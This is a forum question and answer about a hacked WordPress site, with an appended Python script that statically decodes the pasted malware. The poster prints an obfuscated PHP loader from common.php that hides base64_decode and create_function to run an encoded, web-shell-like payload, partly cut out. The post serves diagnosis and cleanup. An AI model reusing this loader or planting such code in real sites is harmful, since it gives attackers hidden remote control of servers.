corrupted / hacked common.php file?

Tags:

wordpress

I am having issues with one of my WordPress sites (constantly logging out users and not letting people log in).

My hosting thinks the root is the common.php file (/public_html/wp-content/common.php).

Can anyone shed any light on what the file is actually doing? Can I just delete it and will WordPress generate a new file?

common.php code:

    <?php

    $alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
    $string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG

*I've had to cut out a lot of the code here as it was over the character limit (about 90,000!!)

    J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
    $array_name = "";
    foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
       $array_name .= $alphabet[$t];
    }
    $a = strrev("noi"."tcnuf"."_eta"."erc");
    $f = $a("", $array_name($string));
    $f();

Thanks in advance

Rich

asked Feb 05 '26 03:02

Richard Prowse


1 Answer

Delete the file. It is not a part of the WordPress install or upgrade package. I would assume that the file is malicious and that your hosting account/personal machine/login credentials have been compromised or something like that.

This is the standard support doc referred to in this case: https://codex.wordpress.org/FAQ_My_site_was_hacked

Then once your site is clean:
http://codex.wordpress.org/Hardening_WordPress

answered Feb 09 '26 01:02

C Travel
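
Added example, not part of the original question or answer: a static triage sketch in Python that resolves the two function names hidden in the posted wrapper without executing any PHP. The helper names `resolve_hidden_names` and `triage` are assumptions made for illustration, and the payload in the sample is a constructed, harmless placeholder.

```python
import base64
import re

# Wrapper as posted in the question; the payload is a constructed placeholder.
PLACEHOLDER = base64.b64encode(b"/* constructed placeholder payload */").decode()
SAMPLE = r'''
$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "PAYLOAD";
$array_name = "";
foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
   $array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();
'''.replace("PAYLOAD", PLACEHOLDER)

# Names that decode a hidden payload or turn a string into executed code.
SUSPICIOUS = {"create_function", "base64_decode", "eval", "assert", "gzinflate"}

LOOP = re.compile(r'foreach\s*\(\s*\[([\d,\s]+)\]\s*as\s*\$(\w+)\s*\)\s*\{\s*'
                  r'\$\w+\s*\.=\s*\$(\w+)\[\$\2\];')
STRREV = re.compile(r'strrev\(\s*((?:"[^"]*"\s*\.?\s*)+)\)')

def resolve_hidden_names(src):
    """Resolve names built by index lookup or strrev(), without running PHP."""
    tables = dict(re.findall(r'\$(\w+)\s*=\s*"([^"]+)";', src))
    names = []
    for idx, _, table in LOOP.findall(src):
        picks = [int(i) for i in idx.split(",") if i.strip()]
        chars = tables.get(table, "")
        if picks and all(i < len(chars) for i in picks):
            names.append("".join(chars[i] for i in picks))
    for pieces in STRREV.findall(src):
        names.append("".join(re.findall(r'"([^"]*)"', pieces))[::-1])
    return names

def triage(src):
    """Return (resolved names, suspicious subset, decoded payload preview).
    A blob that was cut off is decoded up to the last whole 4-character group."""
    names = resolve_hidden_names(src)
    flagged = sorted(n for n in names if n in SUSPICIOUS)
    preview = ""
    blobs = re.findall(r'"([A-Za-z0-9+/=]{16,})', src)
    if blobs and "base64_decode" in names:
        blob = max(blobs, key=len)
        preview = base64.b64decode(blob[:len(blob) // 4 * 4]).decode("latin-1")[:60]
    return names, flagged, preview

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The index list resolves to `base64_decode` and the reversed string to `create_function`, so the wrapper decodes `$string` and executes the result as PHP code.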


